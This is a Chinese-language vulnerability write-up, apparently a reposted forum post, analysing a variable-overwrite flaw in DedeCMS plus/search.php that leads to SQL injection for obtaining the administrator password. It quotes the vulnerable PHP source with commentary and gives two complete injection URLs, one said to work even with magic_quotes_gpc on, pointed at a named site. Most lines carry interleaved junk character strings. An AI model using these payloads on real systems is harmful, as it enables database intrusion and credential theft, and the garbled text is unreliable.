微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
* Q0 a' m4 \( y, n8 u2 @0 y作者: c4rp3nt3r@0x50sec.org
4 p5 w# N# h8 m/ IDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.* s9 `$ L, v+ M% H& L
+ }+ r' @6 l5 X. U# N9 y( z
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.3 B, C. y! [* F& m) p
0 j6 f+ x3 R- u3 H0 k
============
. B% F) B' W5 K7 ~, c# a : f ~+ R/ F8 p$ X8 b
, R5 s1 I }' M
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
# B6 `! M# R( B3 S9 f+ x- m 4 q0 I: ]3 d; p. x$ o8 |
require_once(dirname(__FILE__).”/../include/common.inc.php”);
2 ]& x. t. ^: U# c' | P$ W krequire_once(DEDEINC.”/arc.searchview.class.php”);
% F3 v8 c0 Q* |2 p# n: j7 E% \
1 Q, q3 Y, A$ r8 y3 j; @$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
* E: U: Q% m9 K$ e2 n$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
' M, h, `( C3 a' I; o! i7 X& R$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
( ^5 B6 e) {1 W, q* i" k, K$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
; @! K6 r7 `( h* O, ~$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;) \3 K& V8 @2 }/ Q/ t; U
, _& [/ b8 o1 Q: x- R- |; m! @
if(!isset($orderby)) $orderby=”;
3 @" Q: l. B+ e; Pelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
_- V' F5 C8 n% w( s' \: u + h& C( @9 s! ?. f
5 l! Q# X2 n* n3 I
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
/ j, v: L6 Q' W# @ Z6 selse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);9 g7 j# F/ `+ S$ w. D& [+ r
8 k6 K9 k$ n: v
if(!isset($keyword)){
, z0 \1 Q t- \( ]9 P. T, l0 ` if(!isset($q)) $q = ”;* G: J/ g5 p0 h+ f7 l6 x
$keyword=$q;! L6 K/ N- z" ~" Z
}( W# l1 e' f0 i4 a' V6 r1 h. l
. T% z, @5 x& X, `" k/ x N$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
) N2 T' E- ?" i0 h$ ]' Y& y2 } + r p! W# N( `7 [, `( {
//查找栏目信息0 K n2 Q. O+ G/ J
if(empty($typeid)); k U# ]5 y' U/ d1 I+ j1 Z" C* d% J
{
' L# l/ w6 l9 R7 b, u! t4 K $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
: ?6 B/ F. W) L/ D- F if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
1 p! I( D& y2 H8 D: B% c- _ {( P. }3 y: t* P8 P' Z2 F7 X
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);7 W Z9 V! V2 [3 H
fwrite($fp, “<”.”?php\r\n”);0 m7 z0 L4 H0 q) t
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);/ w/ Q' k- \: Z1 j [& ~+ O r
$dsql->Execute();9 t q; q* l+ v; U% |6 d, Y
while($row = $dsql->GetArray())
1 d) r$ Z# S G0 n$ g6 o {
0 q. t6 I1 `- F* z' Z fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);& d6 k. J/ r! ^. G) w- Z- ]
}
9 j) I3 r8 U' e, ?, C5 ? fwrite($fp, ‘?’.'>’); h' h+ t& |. _: f
fclose($fp);
# U/ L4 `$ h% { }
& u! }# y, p$ ^, c/ o, {+ L) _) E //引入栏目缓存并看关键字是否有相关栏目内容9 z+ N0 [! Z+ _ A$ R4 m4 h
require_once($typenameCacheFile);
" J/ v8 h1 D" l1 C" s, y# c; E7 {# l//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个- @. w+ ?: }$ h9 n9 L7 D8 Y- i
// F0 g$ l# |; P9 `
if(isset($typeArr) && is_array($typeArr))
! H% B% _; T+ N }3 s {0 f0 j+ B. ~# ~0 n t/ g+ ~& i5 d3 h
foreach($typeArr as $id=>$typename)
2 x' p! \* p* }) T. I& G7 o {) p9 V! ^( U) n4 H
9 _5 v* w, y* x& s
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
8 d9 G! m8 L3 a; e6 z- j if($keyword != $keywordn)
# Z) b5 f' _: @& P+ c {/ l, T' }' ?) C& w" U- ^
$keyword = $keywordn;
e+ i" M" H/ o <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设0 u2 u$ t0 e1 N* @, \
break;
4 e7 @7 ^* \/ d# E' \ }
) ^% X2 O7 q4 n, n0 W4 r }
1 T1 \, j- @- B; ^5 } }
# k( C) P- }* g}
$ ?. U0 u! M7 E$ v5 ^" |/ ~+ K& R# f然后plus/search.php文件下面定义了一个 Search类的对象 .+ L* r1 }. G `( @) s
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.$ p: ~7 O5 U# @) V
$this->TypeLink = new TypeLink($typeid);& c" s5 @7 \$ A! k
4 _! i' g7 u4 X- i
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
$ q& \; d5 v! T0 R4 s, ~ P
6 w$ M, z6 d$ f, R; m* r9 B+ Q0 pclass TypeLink
# _) g0 [" R- Z( }; r. E2 U{0 Q* {6 A; L2 x9 h$ L' `
var $typeDir;
" P5 G# B9 b6 |* F2 r' `, G var $dsql;0 F7 Q- w$ M+ }$ x- C! }9 K7 n
var $TypeID;
9 m/ R o3 T6 J' @* N) \# ?! L var $baseDir;$ K+ `, L; p3 L$ Y1 {0 V
var $modDir;. X( g' a1 Z: | K& T
var $indexUrl;+ k) h* \8 C- z7 X
var $indexName;; M2 N" ^& T7 m
var $TypeInfos;
! H: @& f: y& @- s3 W/ W$ v var $SplitSymbol;
% u1 i/ D4 c! b1 @% d# e var $valuePosition;
$ T ~& i. O6 Q! A- }; M var $valuePositionName;
; b. |/ C8 F1 ? var $OptionArrayList;//构造函数///////
0 c; v2 }2 W j- \3 T //php5构造函数: i% h2 H5 a! V; v
function __construct($typeid)
: I. [5 Q, _/ S/ k& p" a& J {& {5 ?5 U, d2 _8 R: F# N
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];* U `0 E) l c$ \: e
$this->indexName = $GLOBALS['cfg_indexname'];
4 q+ y5 j# G& Q6 L0 X1 X& E $this->baseDir = $GLOBALS['cfg_basedir'];
2 |1 B% B3 L) J, y $this->modDir = $GLOBALS['cfg_templets_dir'];2 e$ c3 ]# {7 w, ?0 e1 h
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];: g$ s8 O; u0 ~* ~% L7 c
$this->dsql = $GLOBALS['dsql'];/ f/ s; W4 q3 V, ]/ A7 q+ t
$this->TypeID = $typeid;, U: \& H U) D- r. L1 Q m
$this->valuePosition = ”;4 o' m0 a+ e8 k1 b: n9 B' r% U) R( K
$this->valuePositionName = ”;! X% \% E7 ] p: Z3 J% d9 ~2 N
$this->typeDir = ”;: T9 H& O* i% B
$this->OptionArrayList = ”;
3 @6 ], a: O& W: E: Q3 S8 j 2 u+ g0 ^0 a$ y( Z0 [
//载入类目信息7 @. `* ~) H1 P' k! V" C8 g
* w ~/ l* w: w
<font color=”Red”>$query = “SELECT tp.*,ch.typename as; u! p) K6 m, o7 J& B5 e8 C
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join. i4 C7 O, o/ y8 o W1 g" s7 J; D
`#@__channeltype` ch
8 Q# U9 R/ C6 o9 |2 ` on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
# j/ s3 E# F. ^; v+ W1 U H
1 {. {/ j$ _- s. h2 }: f! G* Q7 Q9 [- x if($typeid > 0)5 i/ i0 b( @: D) ]( k) d l0 v, ~8 l
{
5 c& L/ j1 W/ O% b $this->TypeInfos = $this->dsql->GetOne($query);
2 h* q" A; j% R$ ?! w$ G" ]- b. _利用代码一 需要 即使magic_quotes_gpc = Off
; Y" q1 I2 ]1 z8 ` Z: v$ J, L; O1 h& T) {) r
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title7 S7 U/ e* ]+ M5 S2 z0 F
# t' P9 s8 N% R2 `: Q: p( r
这只是其中一个利用代码… Search 类的构造函数再往下( f& Y# n2 M4 K( k" P! X
4 G; q ]- I0 S* V……省略
3 r7 f, d; ]1 K9 w& G x3 w7 E$this->TypeID = $typeid;8 C9 H: o1 @* L9 a7 d1 O
……省略
! C w7 R5 g3 d5 \4 K+ fif($this->TypeID==”0″){. O3 }' D" P4 R2 f. z
$this->ChannelTypeid=1;
6 D5 Y/ V0 L! I. ] }else{5 l' s4 ? _* T1 p/ ~8 x A' H) A
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲. e7 R" C& A+ f+ N5 a
//现在不鸡肋了吧亲…1 y( J3 _. {( I. W9 W+ w3 r. N0 k: }; {+ O
$this->ChannelTypeid=$row['channeltype'];
" H) H9 ^( G/ e0 x : q$ q7 ?: G; P# C @$ u1 a
}
$ N+ S% C8 D, O# f# B# F' g利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.9 n; D* s8 b3 }" l6 ]
6 A# Z* w. z) w. Zwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
. W0 ]$ P8 k' ^4 I& T
1 o* [& O: K4 q- U如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站) F: @6 e% l. t$ r/ q& n
|